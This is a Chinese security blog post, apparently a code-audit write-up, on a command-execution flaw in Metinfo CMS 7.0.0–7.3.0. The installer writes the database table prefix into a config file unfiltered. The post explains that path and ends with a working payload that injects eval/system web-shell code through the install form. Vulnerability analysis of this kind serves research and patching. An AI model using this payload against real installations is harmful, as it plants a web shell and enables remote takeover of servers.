统计
  • 建站日期:2021-03-15
  • 文章总数:62 篇
  • 评论总数:43 条
  • 分类总数:14 个
  • 最后更新:6天前

Metinfo CMS米拓建站系统1day代码审计与利用

本文阅读 2 分钟
广告

Metinfo CMS命令执行

前话:

米拓企业建站系统是一款由长沙信息科技有限公司自主研发的免费开源企业级CMS,该系统拥有大量的用户使用,及对该款cms进行审计,如果利用CNVD-2021-01930进行进一步深入,其危害的严重性可想而知。

审计过程:

1. Index:
拿到源码先看根目录的index.php看看都包含(加载)了什么文件。

2. 关键词:
在/app/system/entrance.php看到了配置文件的定义,全局搜索这个“PATH_CONFIG”参数。

全局搜索并找到install/index.php文件下有这个参数,点击跟进查看。

在这个文件的219行有个是接收db数据库参数的方法。

官方说明“$_M”数组:https://doc.metinfo.cn/dev/basics/basics75.html

这里是接收from数据的db_prefix参数。也就是“数据表前缀”内容的值。

往下发现是直接写入tableper然后赋值给config变量。

并在264行fopen打开/config/config_db.php进行没有安全过滤的字节流(fputs)方式的写入。

影响版本:

Metinfo CMS 7.3.0 - 7.0.0

一、进行7.3.0安装步骤,访问http://127.0.0.1/install/index.php

二、选中传统安装继续下一步:

三、数据库信息进行写shell

代码执行Payload:
"*/@eval($_GET['1']);@system($_GET['1']);@eval($_GET['1']);@system($_GET['2']);@eval($_GET['1']);@system($_GET['2']);/*

本文来自投稿,不代表本站立场,如若转载,请注明出处:https://www.cnhacker.cc/PenetrationTest/401.html
-- 展开阅读全文 --
AntSword新类型 CmdLinux 预览
« 上一篇 06-27
JAVA序列化流程分析总结
下一篇 » 06-30
广告

发表评论

成为第一个评论的人

作者信息

广告

动态快讯

热门文章

广告

标签TAG

热评文章